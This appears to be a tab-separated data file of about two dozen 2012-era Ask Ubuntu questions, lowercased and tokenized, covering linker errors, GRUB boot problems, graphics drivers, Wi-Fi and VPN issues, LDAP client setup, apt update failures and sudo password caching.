190246	ld can not find math library	i just installed ubuntu 12.04 lts and am having trouble linking to the math functions ( from ) . i have gcc installed and able to compile the source fine . however , trying : gcc -lm montecarlo_time.o parsercfile.o -o trmcfl gives several errors ( of the form ) : montecarlo_time.o : in function main : /home/karthik/research/mc/trmcfl/dumps/whitescaling/18-sep-2012/montecarlo_time.c:75 : undefined reference to asin however , all of these files are present ( and visible to ldconfig -v -n ) /lib/i386-linux-gnu/libm.so.6 /lib64/libm.so.6 /usr/lib/i386-linux-gnu/libm.a /usr/lib/i386-linux-gnu/libm.so /usr/lib/i386-linux-gnu/xen/libm.a /usr/lib64/libm.a /usr/lib64/libm.so why is the linking failing ? any/all help is appreciated . thanks !
190248	installing epd on ubuntu 12.04	i need to install enthought python distribution onto my desktop so that when i go to uni i will have the same software as the desktops in class . i have tried to download it and run the .sh file as an executable file and the terms and condition page loads up . when i scroll down the page it finishes and the page closes . i have tried every single version and i am still having difficulties . i am running ubuntu 12.04 . any help will be appreciated . thank you .
190251	securing ubuntu in every possible way	i want to secure my ubuntu pc from any threats ( network/online to local/offline protection ) . what all can i do ?
190252	installed ubuntu on partition of hd with vista but does n't boot	after trying ubuntu from live cd , i 've decided to install it . i partitioned the hd where my vista installation is by shrinking it on vista , and i 've left the space empty without formatting it ; then i 've used the live cd to install ubuntu ( 12.04 ) , which seemed to complete fine . at boot no grub requester happens and vista boots regularly , whereas from its disk management tool the empty space i had left ( 16 gb ) has been occupied by the ubuntu partition and by the swap ' one . with that there are 4 primary partitions , albeit there was also one more i forgot to unmount before installing ( a virtual cd ) . the results with bootinfoscript are the following : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > windows is installed in the mbr of /dev/sda . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and uses an embedded config file : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - search.fs_uuid 251cd4fd-9366-4344-8d03-96b16e9f3fd4 root set prefix= ( $ root ) /boot/grub -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- - . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows vista boot files : /grldr /bootmgr /boot/bcd /windows/system32/winload.exe /grldr sda2 : __________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sda5 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 12.04.1 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda6 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 944,003,063 944,001,016 7 ntfs / exfat / hpfs /dev/sda2 944,003,070 976,771,071 32,768,002 5 extended /dev/sda5 944,003,072 972,580,863 28,577,792 83 linux /dev/sda6 972,582,912 976,771,071 4,188,160 82 linux swap / solaris drive : sdb _____________________________________________________________________ disk /dev/sdb : 400.1 gb , 400088457216 bytes 255 heads , 63 sectors/track , 48641 cylinders , total 781422768 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 2,048 781,420,543 781,418,496 7 ntfs / exfat / hpfs '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 d616415b16413e2d ntfs /dev/sda5 251cd4fd-9366-4344-8d03-96b16e9f3fd4 ext4 /dev/sda6 a737e065-9bdc-4b16-9d1d-9255f620c10a swap /dev/sdb1 28167adf167aad86 ntfs volume /dev/sr0 iso9660 ubuntu 12.04.1 lts i386 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sda1 /media/d616415b16413e2d fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) =========================== sda5/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 251cd4fd-9366-4344-8d03-96b16e9f3fd4 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 251cd4fd-9366-4344-8d03-96b16e9f3fd4 set locale_dir= ( $ root ) /boot/grub/locale set lang=it_it insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , con linux 3.2.0-29-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 251cd4fd-9366-4344-8d03-96b16e9f3fd4 linux /boot/vmlinuz-3.2.0-29-generic-pae root=uuid=251cd4fd-9366-4344-8d03-96b16e9f3fd4 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-29-generic-pae } menuentry 'ubuntu , con linux 3.2.0-29-generic-pae ( modalită ripristino ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 251cd4fd-9366-4344-8d03-96b16e9f3fd4 echo 'caricamento linux 3.2.0-29-generic-pae ... ' linux /boot/vmlinuz-3.2.0-29-generic-pae root=uuid=251cd4fd-9366-4344-8d03-96b16e9f3fd4 ro recovery nomodeset echo 'caricamento ramdisk iniziale ... ' initrd /boot/initrd.img-3.2.0-29-generic-pae } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 251cd4fd-9366-4344-8d03-96b16e9f3fd4 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 251cd4fd-9366-4344-8d03-96b16e9f3fd4 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows vista ( loader ) ( on /dev/sda1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root d616415b16413e2d chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda5/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=251cd4fd-9366-4344-8d03-96b16e9f3fd4 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=a737e065-9bdc-4b16-9d1d-9255f620c10a none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda5 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) = boot/grub/core.img 1 = boot/grub/grub.cfg 1 = boot/initrd.img-3.2.0-29-generic-pae 1 = boot/vmlinuz-3.2.0-29-generic-pae 1 = initrd.img 1 = vmlinuz 1 ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda2 00000000 20 7d bb d8 ca c3 2a 49 28 cd 16 1c fc 5c f6 c4 | } ... .*i ( ... .\..| 00000010 9b 60 c3 41 fc bd c1 48 0e b4 0b d5 81 d7 b7 ef |.`.a ... h ... ... ..| 00000020 f8 f6 fa 13 7c fb f8 0d b2 80 bb f6 17 49 b3 c8 | ... .| ... ... ..i..| 00000030 ad 8a 32 e8 4d 18 8a eb cc ba 93 72 5d f4 27 2c |..2.m ... ... r ] . ' , | 00000040 7f e0 fd f9 97 f1 f9 cb 9f f2 9d bc 96 7e 1e 01 | ... ... ... ... .~..| 00000050 28 9a e7 ae 09 08 94 35 b0 8f e1 4f 92 44 8c 9a | ( ... ... 5 ... o.d..| 00000060 2d c0 10 21 8b 3f 6b 51 ea ce f7 e7 c2 98 dd 06 |-.. ! . ? kq ... ... ..| 00000070 0d 5e e9 52 30 d8 01 a9 b0 31 4a a9 03 ae 43 69 |.^.r0 ... .1j ... ci| 00000080 3c 5d 92 8a 6e ca 74 67 73 74 53 d4 eb 8b 0a 6c | < ] ..n.tgsts ... .l| 00000090 98 86 6c 24 0c b6 06 b1 11 ae 86 5c 16 00 15 ce |..l $ ... ... .\ ... .| 000000a0 4b aa 80 14 82 3c 22 18 d2 6d 86 da cc 3a 3c 5b |k ... . < `` ..m ... : < [ | 000000b0 72 b3 e3 f3 0e 5f a2 49 92 14 d1 68 58 92 cc 5b |r ... ._.i ... hx.. [ | 000000c0 f2 20 dd 7d e3 f2 a5 58 1e 6e 3e f6 91 b9 f6 d9 | . . } ... x.n > ... ..| 000000d0 34 8d fd ca 42 21 d5 63 35 d0 38 ac 8a ef 93 79 |4 ... b ! .c5.8 ... .y| 000000e0 3f 8a 02 dd 15 cb af f3 6c 9b 86 af ad a6 70 e0 | ? ... ... .l ... ..p.| 000000f0 4f 01 ca 60 db 14 fa ac 61 d9 9c f7 76 80 8d dc |o..` ... .a ... v ... | 00000100 2b de c9 cf 2e 14 b1 92 de d8 46 91 67 19 9f 5d |+ ... ... ... f.g.. ] | 00000110 57 2c 04 43 a4 45 ed 4c 0d fb 8e 2f 3e 74 9f cf |w , .c.e.l ... / > t..| 00000120 e7 ce 3f b7 72 b0 f4 1c c0 0c e8 a2 40 00 4b c8 |.. ? .r ... ... . @ .k.| 00000130 77 ed 66 da 8a cd 86 9c d2 3c de b1 b7 82 d8 e3 |w.f ... ... < ... ... | 00000140 f1 4b 4d d4 47 3f b1 02 63 80 cd 19 70 eb 9f 37 |.km.g ? ..c ... p..7| 00000150 f0 7f cd cc 43 8c 54 af 89 19 b7 5f 1e 6c c2 bb | ... .c.t ... ._.l..| 00000160 51 5b f5 92 c9 7b 3d fe 68 23 b9 9b 30 da c2 82 |q [ ... { =.h # ..0 ... | 00000170 f3 3c d7 7f 6e 39 df 6b 9d 68 1b 7c a1 ac 8e 22 |. < ..n9.k.h.| ... '' | 00000180 aa 9c 4d b8 c3 e8 1b 76 47 2f 9e 27 69 fe dc af |..m ... .vg/ . 'i ... | 00000190 1a 78 77 6d fe 7b ca ac c3 52 c3 25 e8 4e 7d a9 |.xwm . { ... r. % .n } .| 000001a0 b5 8e 5c bd a4 8a 2a 43 e9 a5 e5 66 37 f4 0e 6c |..\ ... *c ... f7..l| 000001b0 0d 33 e2 78 c6 db e3 19 92 6b 00 d4 f5 f8 00 fe |.3.x ... ..k ... ... | 000001c0 ff ff 83 fe ff ff 02 00 00 00 00 10 b4 01 00 fe | ... ... ... ... ... .| 000001d0 ff ff 05 fe ff ff 02 10 b4 01 00 f0 3f 00 00 00 | ... ... ... ... ? ... | 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 =============================== stderr messages : =============================== xz : ( stdin ) : compressed data is corrupt awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in can you help me ?
190255	change gtk-2 scrollbar to something like overlay scrollbar ( in appearance )	when there are scroll wheels on mice and scrollbar functions on thouchpads , a low contrast wide scrollbar doesn’t make sense . so i wanted to change gtk-2.0 scrollbar to something like overlay one – orange narrow slider with white background . i couldn’t find anything about this topic here , so i decided to write something about it .
190262	wifi slow sometimes , reboot helps , how do i debug it ?	ubuntu 12.04.1 with all updates installed . laptop lenovo thinkpad x230 with intel corporation centrino advanced-n 6205 . wifi sometimes becomes extremely slow . often this occurs when i wake the system from suspend and connect to a different network . i find no obvious clues in system logs . /etc/init.d/network-manager restart does n't help , but a reboot does . how can i go on with debugging this issue ? in specific , which parts of the system should i try to restart ( without a complete reboot ) ? i know of problems with intel wifi ( see for example this question and the instructions here ) , but if that was the problem , i would expect the wifi to be slow at all times , and not just sometimes . also , i have a gut feeling that it might be a dns issue ( for example , getting a page from a known server is faster than accessing a new server ) , but i do n't know how to tackle it . update : despite numerous updates in the meanwhile , i still observe this behavior . it happens always when i access my wifi router at home after returning from work ; when i reboot my laptop , the connection speed is good again . edit : i have found the problem ! while at work , i use a cisco-compatible vpn client to connect to intranet ( without it , i only have internet access ) ; package vpnc . the problem appears if and only if i turn on vpn at work , put the computer to sleep , and wake it at home . the vpnc client does not run any longer , but apparently some configuration still lingers ( i will dive into that over the next weeks ) . when at home and i run another vpn connection , and then disconnect with vpnc-disconnect , my problem disappears . the 11n_disable option has no influence on this behavior . i thank both contributors with an upvote , but -- sorry -- not with the bounty . however , the bounty is still to have for the person who will either explain to me what is happening or give me a guide how to debug the vpnc problem .
190263	how do i partition my images for openstack ?	i 'm following the ubuntu openstack beginners guide at : http : //docs.openstack.org/essex/openstack-compute/starter/content/base_os-d1e542.html i have used ubuntu for some years , but always just accepted the standard partition set-up . i 'm now following the instructions which say use ubuntu server , and now i am not sure how to set-up the partitions in the format asked for : we will also be running nova-volume on this server and it is ideal to have a dedicated partition for the use of nova-volume . so , ensure that you choose manual partitioning scheme while installing ubuntu server and create a dedicated partition with adequate amount of space for this purpose . we have referred to this partition in the rest of the chapter as /dev/sda6 . you can substitute the correct device name of this dedicated partition based on your local setup while following the instructions . also ensure that the partition type is set as linux lvm ( 8e ) using fdisk either during install or immediately after installation is over . if you also plan to use a dedicated partition as swift backend , create another partition for this purpose and follow the instructions in `` swift installation '' section below . would anyone be able to advice ? also , i am assuming i am ok to use virtualbox images . finally , on the network configuration instructions : http : //docs.openstack.org/essex/openstack-compute/starter/content/network_configuration-d1e591.html do i actually use the settings below , i do i have to adjust for my settings ? auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.10.10.2 netmask 255.255.255.0 broadcast 10.10.10.255 gateway 10.10.10.1 dns-nameservers 10.10.8.3 auto eth1 iface eth1 inet static address 192.168.3.1 netmask 255.255.255.0 network 192.168.3.0 broadcast 192.168.3.255
190264	how to open .fodt files in libreoffice by default ?	i 'm using .fodt files because i need apply control version systems and git works better with .fodt files than .odt ( .odt is binary , while .fodt is xml , more similar to plain text ) . my problem is that every time i want to open it , i have to click with the right mouse button and select the `` open with ... '' menu . it would be interesting to set my preference in a permanent way .
190265	ldap client can not contact ldap server	i have followed these instructions : https : //help.ubuntu.com/12.04/serverguide/openldap-server.html # openldap-auth-config the ldap server works fine . i can log into it using an ldap account . however , i configured another ubuntu 12.04 server as a ldap client for authentication but i can not contact the server . here is the error : on the client : # ldapsearch -q -lll -y external -h ldapi : //ldap01.domain.local -b cn=config dn ldap_sasl_interactive_bind_s : ca n't contact ldap server ( -1 ) the server can receive requests : on the client : # telnet ldap01.domain.local 389 trying 10.3.17.10 ... connected to sisn01.domain.local . escape character is '^ ] ' . on the client : # ldapsearch -x -h ldap01.domain.local -b cn=config dn # extended ldif # # ldapv3 # base < cn=config > with scope subtree # filter : ( objectclass=* ) # requesting : dn # # search result search : 2 result : 32 no such object # numresponses : 1 on the server : # ps aux | grep slapd openldap 3759 0.0 0.2 564820 8228 ? ssl 08:39 0:00 /usr/sbin/slapd -h ldap : /// ldapi : /// -g openldap -u openldap -f /etc/ldap/slapd.d i suspect i am missing a configuration parameter either on the server or on the client . i just can not figure out what . any help here would be appreciated .
190267	it is possible to install lubuntu with an other computer using lan cable ?	i got a compaq evo n400c computer and it has no bios support for the bootable usb flash drives and there is no cd/dvd rom ! so i want to install the lubuntu 12.04 with the netboot installer , but i have no idea how it works ? i never did like that before so anybody please explain me how it happens ? i found some advices on ubuntudocumentations but it was for ubuntu or ubuntu minimal and there was a lot of codes ... . a bit complicated . the server computer has ubuntu 12.04.1 ( 2.54ghz,650gb hdd , 4gb ram ) the target computer : ( 850mhz , 20gb hdd , 512mb ram )
190269	amd driver not working on ubuntu 12.04	i 've just updated ubuntu to latest version using update manager . it upgraded my kernel to 3.2.0-30 . as always after installing new kernel i 've reinstalled gpu drivers but with no success . amd driver ( 12.8 ) installer says that everything went ok , but running glxinfo | grep 'gl version ' returns the following output : opengl version string : 2.1 mesa 8.0.2 my question is how can i install this drivers ? ps . why does canonical release update that does n't support such a basic feature as gpu drivers are ? here 's output of running fglrxinfo : display : :0.0 screen : 0 opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x300 ) opengl version string : 1.4 ( 2.1 mesa 8.0.2 )
190270	dont delete files on server when we delete ours ?	currently , when i create a file ( in a folder sync with ubuntu one ) , it uploads it on its server . then what i want is `` when i delete this file on my pc , it wont delete from the server '' indeed i use ubuntu one for two reason : 1/ if my pc burns , i can recovery them 2/ if someone come and delete my precious files , i can recovery them . is there a way ? thanks sorry for my english im french : )
190271	internet tv streaming applications	are there any programs for ubuntu that can pull tv streams from the internet ? i have in mind programs that work like the apps that come installed on blu-ray players â bbc iplayer , hulu and/or youtube . i know xmbc can but it 's too fiddly and resource-hungry , i just want `` net tv '' apps and not a full media center . boxee was great for this ; it was a media center but it had an interface for the apps and did n't just stick them in some strange menu as xbmc does .
190273	app to display high-level information about my network ?	i would like to have a simple application to show information about the network i 'm connected to . it should display which computers are connected , how much bandwidth they use and what they use it for . i can do this using nmap and wireshark , etc , but i would like something much simpler , that anyone can use with little information in advance . does anyone know of such an app ?
190274	display resolution question	my machine has two hard drives , one has fedora 64bit and one has ubuntu 12.04 64bit . when running fedora , i can set the resolution to 1600x1200 . but i can only get 1280x1024 when ubuntu is running . how can i get the same resolution as when fedora is running ? one dell monitor in my case . edit : more info here : lspci | grep -i vga shows : 06:00.0 vga compatible controller : nvidia corporation nv37gl [ quadro pci-e series ] ( rev a2 ) sudo lshw -c video shows : *-display unclaimed description : vga compatible controller product : nv37gl [ quadro pci-e series ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:06:00.0 version : a2 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller cap_list configuration : latency=0 resources : memory : dd000000-ddffffff memory : c0000000-cfffffff memory : de000000-deffffff memory : df800000-df81ffff xrandr shows : xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1280 x 1024 , maximum 1280 x 1024 default connected 1280x1024+0+0 0mm x 0mm 1280x1024 0.0* 1024x768 0.0 800x600 0.0 640x480 0.0 lsmod |grep nvidia shows : nothing so it seems there is no driver installed ? how to install the driver ?
190275	does the program abby support youtube or not ?	the description of the abby package says : '' front-end for cclive and clive abby is a front-end for cclive and clive used to download videos from youtube and other similar video hosts . abby is written in c++ and depends on the qt framework . '' also , the website of the project says : '' abby is a front-end ( or a graphical user interface ) for cclive and clive that can be used to download videos from youtube and similar video hosting services . see the above links for a more complete list of supported video websites . '' but when trying to add a link of a video in youtube , the program pops up an error message saying : '' www.youtube.com : unsupported website '' what is the matter ? if it does not support youtube , why use a misleading information in the program description ?
190277	can we replace the kernel config file and get the desired changes in the kernel ?	the question heading is bit confusing i will try to explain myself . i have downloaded kernel source code ( 3.2.29 ) i have a kernel config file from another system ( with the same hardware ) , what i want to do is to able to replace my kernel config file with this kernel config file which has all the desired changes i want in the kernel and compile and install the new kernel . so is it even possible to do so ? as far as i think it should be possible because ultimately the config utilities edit this file only . if it is possible then can someone can guide me as in how to proceed with this correctly . i am new to kernel hacking but love learning it .
190280	how to resolve all symlinks in a directory ?	i 'm trying to make a debian package from upstream source code which is not mine . the configure script provided by author makes a lot of symlinks in source directory . they 're symlinks to all headers in src subdir to include subdir ( so that makefile can easily copy the include directory in the case of installing development package ) . i 'm using debhelper scripts to make package . i 'm using debhelper scripts to make package . the problem is using new debian package format ( quilt 3.0 native ) , debuild refuses add changes of source directory consisting symlinks to final diff file . i 'm getting errors like this : dpkg-source : error : can not represent change to foo.h : dpkg-source : error : new version is symlink to /ba/foo/foo.h dpkg-source : error : old version is nonexistent i 'm aware of the good solution : change configure script not to symlink any header at all . it should add a target to makefile to install devel package . though configure script has copyright issues . i ca n't touch upstream source . i 'm looking for a bash script to replace all symlinks in a directory with actual files they point to . for example if in the directory d there are three files a and b and c , which they ate symlinks to ../../foo/bar/x , ../../foo/bar/z ../../foo/bar/y , running desired script ( say magic.sh ) giving the ./d as first argument , should cp ../../foo/bar/x ./d/a cp ../../foo/bar/y ./d/b cp ../../foo/bar/z ./d/c i ca n't find a way to know which file is a symlink pointing to .
190287	low framerate ati radeon hd 5670	when i try fgl_glxgears , i 'm getting a framerate of under 60 fps . all the forum posts and askubuntu posts i 've read suggest that i should be seeing at least triple digits . when this machine had windows installed it was pretty decent running games like wow at around 60-70fps . $ glxinfo name of display : :0.0 display : :0 screen : 0 direct rendering : yes server glx vendor string : ati server glx version string : 1.4 $ fglrxinfo display : :0.0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 5670 opengl version string : 4.2.11733 compatibility profile context $ dpkg -l fglrx* | grep ^ii | awk ' { print $ 2 } ' fglrx fglrx-amdcccle fglrx-dev i followed this procedure from another post , and saw some increase in performance . sudo apt-get purge fglrx fglrx-dev fglrx-amdcccle sudo apt-get install fglrx-updates fglrx-amdcccle-updates fgl_glxgears = 80-90 fps glxgears = ~300 fps which is more than double previous rates , but i see people with excess of 1000 fps . am i missing something ? update 2 i 've tried installing the proprietary drivers by following the instructions https : //help.ubuntu.com/community/binarydriverhowto/ati with much the same result . update 1 interestingly , if i minimize glxgears while it 's running , i see a fps rate of 5300+ . bonus points : also , there 's this annoying little habit of games to somehow shut off my second monitor . is there a way to stop that ? ( when full screen is enabled )
190288	error in `` update manager ''	i am new to the ubuntu environment , but i am enjoying it - ubuntu 12.04 recently i am having problems with the update manager - it throws the error : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/ubuntuarchive.hnsdc.com_ubuntu_dists_precise_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . ' please help ... thanks in advance ! amit sinha
190292	odd characters in archive update	i 'm trying out ubuntu server 12.04 on a home server and the update is not working . not sure why . i 've done a sudo su and apt-get update . after which i get the following : err gb.archive.ubuntu.com precise inrelease err gb.archive.ubuntu.com precise-updates inrelease err gb.archive.ubuntu.com precise-backports inrelease err security.ubuntu.com precise-security inrelease err archive.canonical.com precise inrelease err extras.ubuntu.com precise inrelease err gb.archive.ubuntu.com precise release.gpg temporary failure resolving âgb.archive.ubuntu.comâ err gb.archive.ubuntu.com precise-updates release.gpg temporary failure resolving âgb.archive.ubuntu.comâ err security.ubuntu.com precise-security release.gpg temporary failure resolving âsecurity.ubuntu.comâ err archive.canonical.com precise release.gpg temporary failure resolving âarchive.canonical.comâ err gb.archive.ubuntu.com precise-backports release.gpg temporary failure resolving âgb.archive.ubuntu.comâ err extras.ubuntu.com precise release.gpg temporary failure resolving âextras.ubuntu.comâ reading package lists ... done w : failed to fetch gb.archive.ubuntu.com/ubuntu/dists/precise/inrelease w : failed to fetch gb.archive.ubuntu.com/ubuntu/dists/precise-updates/inrelease w : failed to fetch gb.archive.ubuntu.com/ubuntu/dists/precise-backports/inrelease w : failed to fetch security.ubuntu.com/ubuntu/dists/precise-security/inrelease w : failed to fetch archive.canonical.com/ubuntu/dists/precise/inrelease w : failed to fetch extras.ubuntu.com/ubuntu/dists/precise/inrelease w : failed to fetch gb.archive.ubuntu.com/ubuntu/dists/precise/release.gpg temporary failure resolving âgb.archive.ubuntu.comâ w : failed to fetch gb.archive.ubuntu.com/ubuntu/dists/precise-updates/release.gpg temporary failure resolving âgb.archive.ubuntu.comâ w : failed to fetch gb.archive.ubuntu.com/ubuntu/dists/precise-backports/release.gpg temporary failure resolving âgb.archive.ubuntu.comâ w : failed to fetch security.ubuntu.com/ubuntu/dists/precise-security/release.gpg temporary failure resolving âsecurity.ubuntu.comâ w : failed to fetch archive.canonical.com/ubuntu/dists/precise/release.gpg temporary failure resolving âarchive.canonical.comâ w : failed to fetch extras.ubuntu.com/ubuntu/dists/precise/release.gpg temporary failure resolving âextras.ubuntu.comâ w : some index files failed to download . they have been ignored , or old ones used instead . there are some odd characters which do not appear in the /etc/apt/sources.list any ideas anyone ? nb i 've had to take out the http : // as i could n't post otherwise . tia dave
190293	gedit drag and drop code	i am using gedit ( 3.4.1 ) and use it to edit my website with it . and usually when i change/remove/edit my website , i have to change all of my html pages to make it look the same , layout wise and , right now i am removing some code , and pasting another in it . my question is . can i have save that code as a snippet or such ? ? ? i want to be able to drop that code onto gedit , and possibly apply that to all over my opened html pages
190302	what open-source video editors are available with 4k capabilities ?	are there any open-source video editors available for ubuntu that have 4k exportation capabilities ? if not , are there any proprietary ( free or paid ) license video editors with these skills ?
190304	how to make songs start later on rhythmbox ?	i want to make a couple of songs start playing after 30 seconds after the beginning and stop playing 30sec before the end . is there a way to do this on rhythmbox ? i know that itunes can do this , or i could use audacity but it would be easier if rhythmbox could .
190307	get rid of broadcom bcm4313 and use only a usb wifi adaptor ralink	please someone help me , i want to disactivate totally broadcom and use my external usb adaptor tp-link , i uninstalled all broadcom drivers from additional drivers and synaptic and ubuntu store , aslo uninstalled the compat-wireless , but i still see it loading please check more infos at pastebin : http : //pastebin.com/7ev3givq thank you solved by removing brcmsmac from the startup : sudo nano /etc/modules thanks again
190311	sudo credential caching on by default	just installed a minimal ubuntu 12.04 , then installed xfce4 and xinit from the command line after first boot . totally vanilla installation afaik . i 'm noticing that sudo caches the password until i issue sudo -k to clear it . this is unexpected behavior in my mind . i 've run xfce4 before and do n't recall credential caching being on , nor have i experienced it in the many previous ubuntu installs i 've had over the years . is this a new feature of ubuntu ? is this something that 's the result of the minimal install ? is this an xfce default that 's been added recently ?
